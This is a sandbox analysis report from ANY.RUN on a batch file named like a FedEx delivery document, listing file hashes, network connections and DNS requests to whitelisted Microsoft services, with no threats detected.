SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7796powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cg3me0wr.siz.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF11e6b3.TMPbinary
MD5:75B35BF3E701352388D3A901ABF7CF91
SHA256:C82BE66347510C4076F102F62B3B3A818B5A6A3871CDBFF1464DE48DAC67BBE6
7796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:3BE97405F3DBAEAC3433A09A31C29ABA
SHA256:B2D4F4550C4F8A98137EA9E025358B16D2F7B042137296AFB7390F01088B78E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
22
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.32.238.112:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7576
SIHClient.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7576
SIHClient.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4024
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5496
MoUsoCoreWorker.exe
23.32.238.112:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.3:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
7576
SIHClient.exe
52.149.20.212:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
google.com
  • 216.58.212.142
whitelisted
crl.microsoft.com
  • 23.32.238.112
  • 23.32.238.107
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.3
  • 20.190.160.130
  • 20.190.160.4
  • 40.126.32.134
  • 20.190.160.17
  • 40.126.32.76
  • 20.190.160.22
  • 40.126.32.133
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
www.microsoft.com
  • 2.23.181.156
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
awb_fedex_documents_delivery_16_04_2025_0000000000000_doc.bat